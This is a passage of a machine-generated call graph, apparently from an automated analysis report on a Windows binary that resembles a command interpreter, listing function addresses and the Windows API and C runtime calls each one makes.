calls 18029->18035 18030 7ff7e1dc855c ??_V@YAXPEAX 18030->18035 18033 7ff7e1dbc855 18031->18033 18032 7ff7e1dbc978 towupper 18032->18035 18039 7ff7e1dbc872 18033->18039 18043 7ff7e1dcc6b8 SetConsoleTitleW 18033->18043 18034->18021 18034->18028 18034->18035 18036 7ff7e1dbd3f0 223 API calls 18034->18036 18035->18021 18035->18022 18035->18027 18035->18028 18035->18029 18035->18030 18035->18032 18037 7ff7e1dcc60e 18035->18037 18050 7ff7e1dbc78a wcschr 18035->18050 18051 7ff7e1dbc83d 18035->18051 18053 7ff7e1dbca25 18035->18053 18056 7ff7e1dcc684 18035->18056 18058 7ff7e1dbca2a 18035->18058 18060 7ff7e1dbca16 GetLastError 18035->18060 18038 7ff7e1dbc741 18036->18038 18040 7ff7e1ddec14 173 API calls 18037->18040 18041 7ff7e1dbc74d 18038->18041 18045 7ff7e1dbc8b5 wcsncmp 18038->18045 18042 7ff7e1dc855c ??_V@YAXPEAX 18039->18042 18040->18035 18041->18035 18253 7ff7e1dbbd38 18041->18253 18044 7ff7e1dbc87c 18042->18044 18043->18039 18047 7ff7e1dc8f80 7 API calls 18044->18047 18045->18035 18045->18041 18048 7ff7e1dbc88e 18047->18048 18048->17999 18050->18035 18261 7ff7e1dbcb40 18051->18261 18055 7ff7e1db3278 166 API calls 18053->18055 18055->18021 18057 7ff7e1db3278 166 API calls 18056->18057 18057->18021 18059 7ff7e1dc9158 7 API calls 18058->18059 18059->18021 18062 7ff7e1db3278 166 API calls 18060->18062 18062->18021 18064 7ff7e1dbcd90 166 API calls 18063->18064 18065 7ff7e1dc5b12 18064->18065 18066 7ff7e1dbcb40 166 API calls 18065->18066 18091 7ff7e1dc5b8b 18065->18091 18068 7ff7e1dc5b26 18066->18068 18067 7ff7e1dc8f80 7 API calls 18069 7ff7e1dbbf99 18067->18069 18070 7ff7e1dc0a6c 273 API calls 18068->18070 18068->18091 18069->17999 18071 7ff7e1dc5b43 18070->18071 18072 7ff7e1dc5bb8 18071->18072 18073 7ff7e1dc5b48 GetConsoleTitleW 18071->18073 18075 7ff7e1dc5bf4 18072->18075 18076 7ff7e1dc5bbd GetConsoleTitleW 18072->18076 18074 7ff7e1dbcad4 172 API calls 18073->18074 18077 7ff7e1dc5b66 18074->18077 18078 7ff7e1dcf452 18075->18078 18079 7ff7e1dc5bfd 18075->18079 18080 7ff7e1dbcad4 172 API calls 18076->18080 18282 7ff7e1dc4224 InitializeProcThreadAttributeList 18077->18282 18082 7ff7e1dc3c24 166 API calls 18078->18082 18085 7ff7e1dcf462 18079->18085 18086 7ff7e1dc5c1b 18079->18086 18079->18091 18083 7ff7e1dc5bdb 18080->18083 18082->18091 18342 7ff7e1db96e8 18083->18342 18089 7ff7e1db3278 166 API calls 18085->18089 18088 7ff7e1db3278 166 API calls 18086->18088 18087 7ff7e1dc5b7f 18090 7ff7e1dc5c3c SetConsoleTitleW 18087->18090 18088->18091 18089->18091 18090->18091 18091->18067 18093 7ff7e1dbc01c 18092->18093 18125 7ff7e1dbc0c4 18092->18125 18094 7ff7e1dbc022 18093->18094 18095 7ff7e1dbc086 18093->18095 18096 7ff7e1dbc030 18094->18096 18097 7ff7e1dbc113 18094->18097 18098 7ff7e1dbc144 18095->18098 18112 7ff7e1dbc094 18095->18112 18099 7ff7e1dbc039 wcschr 18096->18099 18104 7ff7e1dbc053 18096->18104 18097->18104 18109 7ff7e1dbff70 2 API calls 18097->18109 18100 7ff7e1dbc151 18098->18100 18129 7ff7e1dbc1c8 18098->18129 18101 7ff7e1dbc301 18099->18101 18099->18104 18993 7ff7e1dbc460 18100->18993 18108 7ff7e1dbcd90 166 API calls 18101->18108 18102 7ff7e1dbc0c6 18107 7ff7e1dbc0cf wcschr 18102->18107 18116 7ff7e1dbc073 18102->18116 18103 7ff7e1dbc058 18115 7ff7e1dbff70 2 API calls 18103->18115 18103->18116 18104->18102 18104->18103 18120 7ff7e1dbc211 18104->18120 18106 7ff7e1dbc460 183 API calls 18106->18112 18113 7ff7e1dbc1be 18107->18113 18107->18116 18110 7ff7e1dbc30b 18108->18110 18109->18104 18110->18120 18122 7ff7e1dbc3d4 18110->18122 18123 7ff7e1dbd840 178 API calls 18110->18123 18110->18125 18112->18106 18112->18125 18114 7ff7e1dbcd90 166 API calls 18113->18114 18114->18129 18115->18116 18118 7ff7e1dbc460 183 API calls 18116->18118 18116->18125 18117 7ff7e1dbc460 183 API calls 18117->18125 18118->18116 18119 7ff7e1dbc285 18119->18120 18126 7ff7e1dbb6b0 170 API calls 18119->18126 18124 7ff7e1dbff70 2 API calls 18120->18124 18121 7ff7e1dbb6b0 170 API calls 18121->18104 18122->18116 18122->18120 18122->18121 18123->18110 18124->18125 18125->17989 18128 7ff7e1dbc2ac 18126->18128 18127 7ff7e1dbd840 178 API calls 18127->18129 18128->18116 18128->18120 18129->18119 18129->18120 18129->18125 18129->18127 18131 7ff7e1dbca40 17 API calls 18130->18131 18139 7ff7e1dbb162 18131->18139 18132 7ff7e1dbb303 18135 7ff7e1dc8f80 7 API calls 18132->18135 18133 7ff7e1dbb2f7 ??_V@YAXPEAX 18133->18132 18134 7ff7e1dbb1d9 18138 7ff7e1dbcd90 166 API calls 18134->18138 18140 7ff7e1dbb1ed 18134->18140 18137 7ff7e1dbb315 18135->18137 18136 7ff7e1dc1ea0 8 API calls 18136->18139 18137->17986 18137->18001 18138->18140 18139->18134 18139->18136 18160 7ff7e1dbb2e1 18139->18160 18142 7ff7e1dbb228 _get_osfhandle 18140->18142 18143 7ff7e1dcbfef _get_osfhandle SetFilePointer 18140->18143 18144 7ff7e1dbaffc _dup 18140->18144 18149 7ff7e1dcc1c3 18140->18149 18150 7ff7e1dc01b8 6 API calls 18140->18150 18151 7ff7e1dbd208 _close 18140->18151 18155 7ff7e1dcc060 18140->18155 18157 7ff7e1dbb038 _dup2 18140->18157 18158 7ff7e1dcc246 18140->18158 18159 7ff7e1dcc1a5 18140->18159 18140->18160 18162 7ff7e1dc26e0 19 API calls 18140->18162 18165 7ff7e1dbb356 18140->18165 19007 7ff7e1ddf318 _get_osfhandle GetFileType 18140->19007 18142->18140 18145 7ff7e1dbb23f _get_osfhandle 18142->18145 18143->18140 18146 7ff7e1dcc01d 18143->18146 18144->18140 18145->18140 18147 7ff7e1dc33f0 _vsnwprintf 18146->18147 18148 7ff7e1dcc038 18147->18148 18153 7ff7e1db3278 166 API calls 18148->18153 18152 7ff7e1dc33f0 _vsnwprintf 18149->18152 18150->18140 18151->18140 18152->18148 18154 7ff7e1dcc1f9 18153->18154 18156 7ff7e1dbaf98 2 API calls 18154->18156 18155->18158 18163 7ff7e1dc09f4 2 API calls 18155->18163 18156->18160 18157->18140 18164 7ff7e1dbaf98 2 API calls 18158->18164 18161 7ff7e1dbb038 _dup2 18159->18161 18160->18132 18160->18133 18166 7ff7e1dcc1b7 18161->18166 18162->18140 18167 7ff7e1dcc084 18163->18167 18168 7ff7e1dcc24b 18164->18168 18174 7ff7e1dbaf98 2 API calls 18165->18174 18170 7ff7e1dcc1be 18166->18170 18171 7ff7e1dcc207 18166->18171 18172 7ff7e1dbb900 166 API calls 18167->18172 18169 7ff7e1ddf1d8 166 API calls 18168->18169 18169->18160 18175 7ff7e1dbd208 _close 18170->18175 18173 7ff7e1dbd208 _close 18171->18173 18176 7ff7e1dcc08c 18172->18176 18173->18165 18177 7ff7e1dcc211 18174->18177 18175->18149 18178 7ff7e1dcc094 wcsrchr 18176->18178 18189 7ff7e1dcc0ad 18176->18189 18179 7ff7e1dc33f0 _vsnwprintf 18177->18179 18178->18189 18180 7ff7e1dcc22c 18179->18180 18181 7ff7e1db3278 166 API calls 18180->18181 18181->18160 18182 7ff7e1dcc106 18184 7ff7e1dbff70 2 API calls 18182->18184 18183 7ff7e1dcc0e0 _wcsnicmp 18183->18189 18185 7ff7e1dcc13b 18184->18185 18185->18158 18186 7ff7e1dcc146 SearchPathW 18185->18186 18186->18158 18187 7ff7e1dcc188 18186->18187 18188 7ff7e1dc26e0 19 API calls 18187->18188 18188->18159 18189->18182 18189->18183 18191 7ff7e1db88fc 18190->18191 18193 7ff7e1db88cf 18190->18193 18191->18000 18194 7ff7e1dc0a6c 18191->18194 18192 7ff7e1db88df _wcsicmp 18192->18193 18193->18191 18193->18192 18195 7ff7e1dc1ea0 8 API calls 18194->18195 18196 7ff7e1dc0ab9 18195->18196 18197 7ff7e1dc0b12 memset 18196->18197 18198 7ff7e1dcd927 18196->18198 18199 7ff7e1dc0aee _wcsnicmp 18196->18199 18202 7ff7e1dc128f ??_V@YAXPEAX 18196->18202 18200 7ff7e1dbca40 17 API calls 18197->18200 18201 7ff7e1dc081c 166 API calls 18198->18201 18199->18197 18199->18198 18203 7ff7e1dc0b5a 18200->18203 18204 7ff7e1dcd933 18201->18204 18205 7ff7e1dbb364 17 API calls 18203->18205 18211 7ff7e1dcd94e 18203->18211 18204->18197 18204->18202 18206 7ff7e1dc0b6f 18205->18206 18206->18202 18208 7ff7e1dc0b8c wcschr 18206->18208 18206->18211 18213 7ff7e1dc0c0f wcsrchr 18206->18213 18215 7ff7e1dc081c 166 API calls 18206->18215 18221 7ff7e1dbcd90 166 API calls 18206->18221 18222 7ff7e1dc3060 171 API calls 18206->18222 18223 7ff7e1dbd3f0 223 API calls 18206->18223 18224 7ff7e1dbaf74 170 API calls 18206->18224 18225 7ff7e1dc0d71 wcsrchr 18206->18225 18227 7ff7e1dc1ea0 8 API calls 18206->18227 18229 7ff7e1dc0fb1 wcsrchr 18206->18229 18230 7ff7e1dc0fd0 wcschr 18206->18230 18233 7ff7e1dc10fd wcsrchr 18206->18233 18240 7ff7e1dc2eb4 22 API calls 18206->18240 18243 7ff7e1dc1087 _wcsicmp 18206->18243 18245 7ff7e1dcda74 18206->18245 19008 7ff7e1dc3bac 18206->19008 19012 7ff7e1dc291c GetDriveTypeW 18206->19012 19015 7ff7e1dc2efc 18206->19015 18207 7ff7e1dcd96b ??_V@YAXPEAX 18207->18211 18208->18206 18211->18207 18212 7ff7e1dcd99a wcschr 18211->18212 18214 7ff7e1dcd9ca GetFileAttributesW 18211->18214 18217 7ff7e1dcda64 18211->18217 18218 7ff7e1dcd9fd ??_V@YAXPEAX 18211->18218 18212->18211 18213->18206 18213->18211 18214->18211 18214->18217 18215->18206 18216 7ff7e1dcda90 GetFileAttributesW 18216->18211 18219 7ff7e1dcdaa8 GetLastError 18216->18219 18218->18211 18219->18217 18220 7ff7e1dcdab9 18219->18220 18220->18211 18221->18206 18222->18206 18223->18206 18224->18206 18225->18206 18226 7ff7e1dc0d97 NeedCurrentDirectoryForExePathW 18225->18226 18226->18206 18226->18211 18227->18206 18229->18206 18229->18230 18230->18217 18231 7ff7e1dc0fed wcschr 18230->18231 18231->18206 18231->18217 18233->18206 18234 7ff7e1dc111a _wcsicmp 18233->18234 18235 7ff7e1dc1138 _wcsicmp 18234->18235 18236 7ff7e1dc123d 18234->18236 18235->18236 18237 7ff7e1dc10c5 18235->18237 18238 7ff7e1dc1175 18236->18238 18241 7ff7e1dc1250 ??_V@YAXPEAX 18236->18241 18237->18238 18239 7ff7e1dc1169 ??_V@YAXPEAX 18237->18239 18242 7ff7e1dc8f80 7 API calls 18238->18242 18239->18238 18240->18206 18241->18238 18244 7ff7e1dc1189 18242->18244 18243->18245 18246 7ff7e1dc10a7 _wcsicmp 18243->18246 18244->18000 18245->18216 18245->18217 18246->18237 18246->18245 18248 7ff7e1db7211 _setjmp 18247->18248 18252 7ff7e1db7279 18247->18252 18250 7ff7e1db7265 18248->18250 18248->18252 19029 7ff7e1db72b0 18250->19029 18252->18006 18254 7ff7e1dbbd6f 18253->18254 18258 7ff7e1dbbda2 18253->18258 18254->18258 18277 7ff7e1ddeaf0 18254->18277 18256 7ff7e1dcc4ab 18257 7ff7e1db3240 166 API calls 18256->18257 18256->18258 18259 7ff7e1dcc4bc 18257->18259 18258->18035 18259->18258 18260 7ff7e1db3240 166 API calls 18259->18260 18260->18259 18262 7ff7e1dbcb63 18261->18262 18263 7ff7e1dbcd90 166 API calls 18262->18263 18264 7ff7e1dbc848 18263->18264 18264->18033 18265 7ff7e1dbcad4 18264->18265 18266 7ff7e1dbcb05 18265->18266 18267 7ff7e1dbcad9 18265->18267 18266->18033 18267->18266 18268 7ff7e1dbcd90 166 API calls 18267->18268 18269 7ff7e1dcc722 18268->18269 18269->18266 18270 7ff7e1dcc72e GetConsoleTitleW 18269->18270 18270->18266 18271 7ff7e1dcc74a 18270->18271 18272 7ff7e1dbb6b0 170 API calls 18271->18272 18276 7ff7e1dcc778 18272->18276 18273 7ff7e1dcc7ec 18274 7ff7e1dbff70 2 API calls 18273->18274 18274->18266 18275 7ff7e1dcc7dd SetConsoleTitleW 18275->18273 18276->18273 18276->18275 18278 7ff7e1db3410 18 API calls 18277->18278 18279 7ff7e1ddeb1e 18278->18279 18280 7ff7e1dbb998 207 API calls 18279->18280 18281 7ff7e1ddeb2e 18280->18281 18281->18256 18283 7ff7e1dcecd4 GetLastError 18282->18283 18284 7ff7e1dc42ab UpdateProcThreadAttribute 18282->18284 18285 7ff7e1dcecee 18283->18285 18286 7ff7e1dcecf0 GetLastError 18284->18286 18287 7ff7e1dc42eb memset memset GetStartupInfoW 18284->18287 18391 7ff7e1dd9eec 18286->18391 18366 7ff7e1dc3a90 18287->18366 18292 7ff7e1dbb900 166 API calls 18293 7ff7e1dc43bb 18292->18293 18294 7ff7e1dc4638 _local_unwind 18293->18294 18295 7ff7e1dc43cc 18293->18295 18294->18295 18296 7ff7e1dc4415 18295->18296 18297 7ff7e1dc43de wcsrchr 18295->18297 18378 7ff7e1dc5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 18296->18378 18297->18296 18298 7ff7e1dc43f7 lstrcmpW 18297->18298 18298->18296 18300 7ff7e1dc4668 18298->18300 18379 7ff7e1dd9044 18300->18379 18301 7ff7e1dc441a 18303 7ff7e1dc442a CreateProcessW 18301->18303 18305 7ff7e1dc4596 CreateProcessAsUserW 18301->18305 18304 7ff7e1dc448b 18303->18304 18306 7ff7e1dc4672 GetLastError 18304->18306 18307 7ff7e1dc4495 CloseHandle 18304->18307 18305->18304 18317 7ff7e1dc468d 18306->18317 18308 7ff7e1dc498c 8 API calls 18307->18308 18309 7ff7e1dc44c5 18308->18309 18312 7ff7e1dc44cd 18309->18312 18309->18317 18310 7ff7e1dc47a3 18310->18087 18311 7ff7e1dc44f8 18311->18310 18313 7ff7e1dc4612 18311->18313 18315 7ff7e1dc5cb4 7 API calls 18311->18315 18312->18310 18312->18311 18331 7ff7e1dda250 33 API calls 18312->18331 18316 7ff7e1dc461c 18313->18316 18319 7ff7e1dc47e1 CloseHandle 18313->18319 18314 7ff7e1dbcd90 166 API calls 18318 7ff7e1dc4724 18314->18318 18320 7ff7e1dc4517 18315->18320 18322 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18316->18322 18317->18312 18317->18314 18321 7ff7e1dc472c _local_unwind 18318->18321 18328 7ff7e1dc473d 18318->18328 18319->18316 18323 7ff7e1dc33f0 _vsnwprintf 18320->18323 18321->18328 18324 7ff7e1dc47fa DeleteProcThreadAttributeList 18322->18324 18325 7ff7e1dc4544 18323->18325 18326 7ff7e1dc8f80 7 API calls 18324->18326 18327 7ff7e1dc498c 8 API calls 18325->18327 18329 7ff7e1dc4820 18326->18329 18330 7ff7e1dc4558 18327->18330 18332 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18328->18332 18329->18087 18333 7ff7e1dc4564 18330->18333 18334 7ff7e1dc47ae 18330->18334 18331->18311 18335 7ff7e1dc475b _local_unwind 18332->18335 18336 7ff7e1dc498c 8 API calls 18333->18336 18337 7ff7e1dc33f0 _vsnwprintf 18334->18337 18335->18312 18338 7ff7e1dc4577 18336->18338 18337->18313 18338->18316 18339 7ff7e1dc457f 18338->18339 18340 7ff7e1dda920 210 API calls 18339->18340 18341 7ff7e1dc4584 18340->18341 18341->18316 18346 7ff7e1db9737 18342->18346 18344 7ff7e1dbcd90 166 API calls 18344->18346 18345 7ff7e1db977d memset 18347 7ff7e1dbca40 17 API calls 18345->18347 18346->18344 18346->18345 18348 7ff7e1dcb7b3 18346->18348 18349 7ff7e1dcb76e 18346->18349 18351 7ff7e1dbb364 17 API calls 18346->18351 18358 7ff7e1dcb79a 18346->18358 18361 7ff7e1db986d 18346->18361 18398 7ff7e1dc1fac memset 18346->18398 18425 7ff7e1dbce10 18346->18425 18475 7ff7e1db96b4 18346->18475 18480 7ff7e1dc5920 18346->18480 18347->18346 18350 7ff7e1db3278 166 API calls 18349->18350 18354 7ff7e1dcb787 18350->18354 18351->18346 18352 7ff7e1dc855c ??_V@YAXPEAX 18352->18348 18353 7ff7e1dcb795 18494 7ff7e1dd7694 18353->18494 18354->18353 18486 7ff7e1dde944 18354->18486 18358->18352 18362 7ff7e1db9880 ??_V@YAXPEAX 18361->18362 18363 7ff7e1db988c 18361->18363 18362->18363 18364 7ff7e1dc8f80 7 API calls 18363->18364 18365 7ff7e1db989d 18364->18365 18365->18087 18367 7ff7e1dc3aa4 18366->18367 18376 7ff7e1dc3b73 18366->18376 18367->18376 18393 7ff7e1dc09f4 18367->18393 18370 7ff7e1dbb900 166 API calls 18371 7ff7e1dc3ad0 18370->18371 18372 7ff7e1dc3ad8 wcsrchr 18371->18372 18375 7ff7e1dc3af4 18371->18375 18372->18375 18373 7ff7e1dc3b66 18374 7ff7e1dbff70 2 API calls 18373->18374 18374->18376 18375->18373 18377 7ff7e1dc3b2d _wcsnicmp 18375->18377 18376->18292 18377->18375 18380 7ff7e1dc3a90 170 API calls 18379->18380 18381 7ff7e1dd9064 18380->18381 18382 7ff7e1dd906e 18381->18382 18384 7ff7e1dd9083 18381->18384 18383 7ff7e1dc498c 8 API calls 18382->18383 18385 7ff7e1dd9081 18383->18385 18384->18384 18386 7ff7e1dbcd90 166 API calls 18384->18386 18385->18296 18387 7ff7e1dd909b 18386->18387 18387->18385 18388 7ff7e1dc498c 8 API calls 18387->18388 18389 7ff7e1dd90ec 18388->18389 18390 7ff7e1dbff70 2 API calls 18389->18390 18390->18385 18392 7ff7e1dced0a DeleteProcThreadAttributeList 18391->18392 18392->18285 18394 7ff7e1dc0a3c 18393->18394 18395 7ff7e1dc0a0b iswspace 18393->18395 18394->18370 18396 7ff7e1dc0a21 wcschr 18395->18396 18397 7ff7e1dc0a50 18395->18397 18396->18394 18396->18397 18397->18394 18397->18395 18397->18396 18400 7ff7e1dc203b 18398->18400 18399 7ff7e1dc20b0 18402 7ff7e1dc3060 171 API calls 18399->18402 18404 7ff7e1dc211c 18399->18404 18400->18399 18401 7ff7e1dc2094 18400->18401 18403 7ff7e1dc20a6 18401->18403 18405 7ff7e1db3278 166 API calls 18401->18405 18402->18404 18407 7ff7e1dc8f80 7 API calls 18403->18407 18404->18403 18500 7ff7e1dc2e44 18404->18500 18405->18403 18408 7ff7e1dc2325 18407->18408 18408->18346 18409 7ff7e1dc2148 18409->18403 18505 7ff7e1dc2d70 18409->18505 18412 7ff7e1dbb900 166 API calls 18414 7ff7e1dc21d0 18412->18414 18413 7ff7e1dce04a ??_V@YAXPEAX 18413->18403 18414->18413 18415 7ff7e1dc22a4 ??_V@YAXPEAX 18414->18415 18416 7ff7e1dc221c wcsspn 18414->18416 18415->18403 18418 7ff7e1dbb900 166 API calls 18416->18418 18419 7ff7e1dc223b 18418->18419 18419->18413 18423 7ff7e1dc2252 18419->18423 18420 7ff7e1dc228f 18421 7ff7e1dbd3f0 223 API calls 18420->18421 18421->18415 18422 7ff7e1dce06d wcschr 18422->18423 18423->18420 18423->18422 18424 7ff7e1dce090 towupper 18423->18424 18424->18420 18424->18423 18463 7ff7e1dbd0f8 18425->18463 18474 7ff7e1dbce5b 18425->18474 18426 7ff7e1dc8f80 7 API calls 18429 7ff7e1dbd10a 18426->18429 18427 7ff7e1dcc860 18428 7ff7e1dcc97c 18427->18428 18431 7ff7e1ddee88 390 API calls 18427->18431 18430 7ff7e1dde9b4 197 API calls 18428->18430 18429->18346 18433 7ff7e1dcc981 longjmp 18430->18433 18434 7ff7e1dcc879 18431->18434 18435 7ff7e1dcc99a 18433->18435 18436 7ff7e1dcc882 EnterCriticalSection LeaveCriticalSection 18434->18436 18437 7ff7e1dcc95c 18434->18437 18440 7ff7e1dcc9b3 ??_V@YAXPEAX 18435->18440 18435->18463 18442 7ff7e1dbd0e3 18436->18442 18437->18428 18443 7ff7e1db96b4 186 API calls 18437->18443 18438 7ff7e1dbcd90 166 API calls 18438->18474 18440->18463 18441 7ff7e1dbceaa _tell 18444 7ff7e1dbd208 _close 18441->18444 18442->18346 18443->18437 18444->18474 18445 7ff7e1dcc9d5 18625 7ff7e1ddd610 18445->18625 18447 7ff7e1dbb900 166 API calls 18447->18474 18449 7ff7e1dcca07 18450 7ff7e1dde91c 198 API calls 18449->18450 18455 7ff7e1dcca0c 18450->18455 18451 7ff7e1ddbfec 176 API calls 18452 7ff7e1dcc9f1 18451->18452 18453 7ff7e1db3240 166 API calls 18452->18453 18453->18449 18454 7ff7e1dbcf33 memset 18454->18474 18455->18346 18456 7ff7e1dbca40 17 API calls 18456->18474 18457 7ff7e1dbd184 wcschr 18457->18474 18459 7ff7e1dcc9c9 18461 7ff7e1dc855c ??_V@YAXPEAX 18459->18461 18460 7ff7e1dbd1a7 wcschr 18460->18474 18461->18463 18463->18426 18464 7ff7e1dc0a6c 273 API calls 18464->18474 18465 7ff7e1dbbe00 635 API calls 18465->18474 18466 7ff7e1dc3448 166 API calls 18466->18474 18467 7ff7e1dbcfab _wcsicmp 18467->18474 18468 7ff7e1dc0580 12 API calls 18469 7ff7e1dbd003 GetConsoleOutputCP GetCPInfo 18468->18469 18470 7ff7e1dc04f4 3 API calls 18469->18470 18470->18474 18472 7ff7e1dc1fac 238 API calls 18472->18474 18473 7ff7e1dbd044 ??_V@YAXPEAX 18473->18474 18474->18427 18474->18435 18474->18438 18474->18442 18474->18445 18474->18447 18474->18454 18474->18456 18474->18457 18474->18459 18474->18460 18474->18463 18474->18464 18474->18465 18474->18466 18474->18467 18474->18468 18474->18472 18474->18473 18515 7ff7e1dc0494 18474->18515 18528 7ff7e1dbdf60 18474->18528 18548 7ff7e1ddbfec 18474->18548 18584 7ff7e1dd778c 18474->18584 18615 7ff7e1ddc738 18474->18615 18476 7ff7e1dcb6e2 RevertToSelf CloseHandle 18475->18476 18477 7ff7e1db96c8 18475->18477 18478 7ff7e1db96ce 18477->18478 18479 7ff7e1db6a48 184 API calls 18477->18479 18478->18346 18479->18477 18481 7ff7e1dc596c 18480->18481 18485 7ff7e1dc5a12 18480->18485 18482 7ff7e1dc598d VirtualQuery 18481->18482 18481->18485 18484 7ff7e1dc59ad 18482->18484 18482->18485 18483 7ff7e1dc59b7 VirtualQuery 18483->18484 18483->18485 18484->18483 18484->18485 18485->18346 18487 7ff7e1dde954 18486->18487 18488 7ff7e1dde990 18486->18488 18489 7ff7e1ddee88 390 API calls 18487->18489 18490 7ff7e1dde9b4 197 API calls 18488->18490 18491 7ff7e1dde964 18489->18491 18492 7ff7e1dde995 longjmp 18490->18492 18491->18488 18493 7ff7e1db96b4 186 API calls 18491->18493 18493->18491 18495 7ff7e1dd76a3 18494->18495 18496 7ff7e1dd76b7 18495->18496 18497 7ff7e1db96b4 186 API calls 18495->18497 18498 7ff7e1dde9b4 197 API calls 18496->18498 18497->18495 18499 7ff7e1dd76bc longjmp 18498->18499 18501 7ff7e1dc9324 malloc 18500->18501 18502 7ff7e1dc2e7b 18501->18502 18503 7ff7e1dc2e83 memset 18502->18503 18504 7ff7e1dc2e90 18502->18504 18503->18504 18504->18409 18506 7ff7e1dc2da3 18505->18506 18507 7ff7e1dc2d89 18505->18507 18506->18507 18508 7ff7e1dc2dbc GetProcessHeap RtlFreeHeap 18506->18508 18510 7ff7e1dc21af 18507->18510 18511 7ff7e1dc2e0c 18507->18511 18508->18506 18508->18507 18510->18412 18512 7ff7e1dc2e11 18511->18512 18513 7ff7e1dc2e32 18511->18513 18512->18513 18514 7ff7e1dce494 VirtualFree 18512->18514 18513->18507 18517 7ff7e1dc04a4 18515->18517 18516 7ff7e1dc26e0 19 API calls 18516->18517 18517->18516 18518 7ff7e1dc04b9 _get_osfhandle SetFilePointer 18517->18518 18519 7ff7e1dcd845 18517->18519 18520 7ff7e1dcd839 18517->18520 18522 7ff7e1db3278 166 API calls 18517->18522 18518->18474 18521 7ff7e1ddf1d8 166 API calls 18519->18521 18523 7ff7e1db3278 166 API calls 18520->18523 18525 7ff7e1dcd837 18521->18525 18524 7ff7e1dcd819 _getch 18522->18524 18523->18525 18524->18517 18526 7ff7e1dcd832 18524->18526 18634 7ff7e1ddbde4 EnterCriticalSection LeaveCriticalSection 18526->18634 18529 7ff7e1dbdfe2 18528->18529 18530 7ff7e1dbdf93 18528->18530 18532 7ff7e1dbe00b _setjmp 18529->18532 18533 7ff7e1dbe100 VirtualFree 18529->18533 18530->18529 18531 7ff7e1dbdf9f GetProcessHeap RtlFreeHeap 18530->18531 18531->18529 18531->18530 18534 7ff7e1dbe04a 18532->18534 18542 7ff7e1dbe0c3 18532->18542 18533->18529 18635 7ff7e1dbe600 18534->18635 18536 7ff7e1dbe073 18537 7ff7e1dbe081 18536->18537 18538 7ff7e1dbe0e0 longjmp 18536->18538 18644 7ff7e1dbd250 18537->18644 18540 7ff7e1dbe0b0 18538->18540 18540->18542 18675 7ff7e1ddd3fc 18540->18675 18542->18441 18545 7ff7e1dbe600 473 API calls 18546 7ff7e1dbe0a7 18545->18546 18546->18540 18547 7ff7e1ddd610 167 API calls 18546->18547 18547->18540 18549 7ff7e1ddc036 18548->18549 18550 7ff7e1ddc047 18548->18550 18551 7ff7e1db3240 166 API calls 18549->18551 18552 7ff7e1ddc6db 18550->18552 18555 7ff7e1ddc067 18550->18555 18558 7ff7e1dc3448 166 API calls 18550->18558 18553 7ff7e1ddc042 18551->18553 18554 7ff7e1dc8f80 7 API calls 18552->18554 18967 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 18553->18967 18557 7ff7e1ddc6eb 18554->18557 18559 7ff7e1dc081c 166 API calls 18555->18559 18561 7ff7e1ddc070 18555->18561 18557->18474 18558->18555 18559->18561 18560 7ff7e1dc417c 166 API calls 18562 7ff7e1ddc0d1 18560->18562 18561->18560 18968 7ff7e1ddbf84 18562->18968 18565 7ff7e1ddc673 18566 7ff7e1dc33f0 _vsnwprintf 18565->18566 18567 7ff7e1ddc696 18566->18567 18569 7ff7e1dc34a0 166 API calls 18567->18569 18568 7ff7e1ddc1c5 towupper 18570 7ff7e1ddc11a 18568->18570 18571 7ff7e1ddc6ce 18569->18571 18570->18567 18570->18568 18572 7ff7e1dc33f0 _vsnwprintf 18570->18572 18573 7ff7e1dc3140 166 API calls 18570->18573 18575 7ff7e1db6ee4 166 API calls 18570->18575 18578 7ff7e1ddc2db GetDriveTypeW 18570->18578 18579 7ff7e1dc33f0 _vsnwprintf 18570->18579 18581 7ff7e1ddc3ab 18570->18581 18972 7ff7e1db586c GetVersion 18570->18972 18977 7ff7e1dc885c FormatMessageW 18570->18977 18571->18552 18978 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 18571->18978 18572->18570 18573->18570 18575->18570 18578->18570 18580 7ff7e1ddc5c8 LocalFree 18579->18580 18580->18570 18582 7ff7e1dc33f0 _vsnwprintf 18581->18582 18583 7ff7e1ddc3bd 18582->18583 18583->18474 18592 7ff7e1dd77bc 18584->18592 18585 7ff7e1dd79c0 18597 7ff7e1dc34a0 166 API calls 18585->18597 18586 7ff7e1dd7aca 18587 7ff7e1dc34a0 166 API calls 18586->18587 18590 7ff7e1dd7adb 18587->18590 18589 7ff7e1dd7ab5 18596 7ff7e1dc3448 166 API calls 18589->18596 18594 7ff7e1dd7af0 18590->18594 18598 7ff7e1dc3448 166 API calls 18590->18598 18591 7ff7e1dd7984 18591->18585 18595 7ff7e1dd7989 18591->18595 18592->18585 18592->18586 18592->18589 18592->18591 18593 7ff7e1dd7a00 18592->18593 18592->18595 18605 7ff7e1dd79ef 18592->18605 18609 7ff7e1dc3448 166 API calls 18592->18609 18611 7ff7e1dd778c 166 API calls 18592->18611 18601 7ff7e1dd7a0b 18593->18601 18593->18605 18612 7ff7e1dd7a33 18593->18612 18599 7ff7e1dd778c 166 API calls 18594->18599 18595->18605 18986 7ff7e1dd76e0 18595->18986 18596->18605 18600 7ff7e1dd79d6 18597->18600 18598->18594 18602 7ff7e1dd7afb 18599->18602 18603 7ff7e1dc3448 166 API calls 18600->18603 18614 7ff7e1dd79e7 18600->18614 18601->18605 18606 7ff7e1dc34a0 166 API calls 18601->18606 18602->18595 18607 7ff7e1dc3448 166 API calls 18602->18607 18603->18614 18605->18474 18610 7ff7e1dd7a23 18606->18610 18607->18595 18608 7ff7e1dc3448 166 API calls 18608->18605 18609->18592 18613 7ff7e1dd778c 166 API calls 18610->18613 18611->18592 18612->18608 18613->18614 18982 7ff7e1dd7730 18614->18982 18616 7ff7e1ddc775 18615->18616 18623 7ff7e1ddc7ab 18615->18623 18617 7ff7e1dbcd90 166 API calls 18616->18617 18619 7ff7e1ddc781 18617->18619 18618 7ff7e1ddc8d4 18618->18474 18619->18618 18620 7ff7e1dbb0d8 194 API calls 18619->18620 18620->18618 18621 7ff7e1dbb6b0 170 API calls 18621->18623 18622 7ff7e1dbb038 _dup2 18622->18623 18623->18618 18623->18619 18623->18621 18623->18622 18624 7ff7e1dbd208 _close 18623->18624 18624->18623 18626 7ff7e1ddd63d 18625->18626 18632 7ff7e1ddd635 18625->18632 18627 7ff7e1ddd658 18626->18627 18628 7ff7e1ddd64a 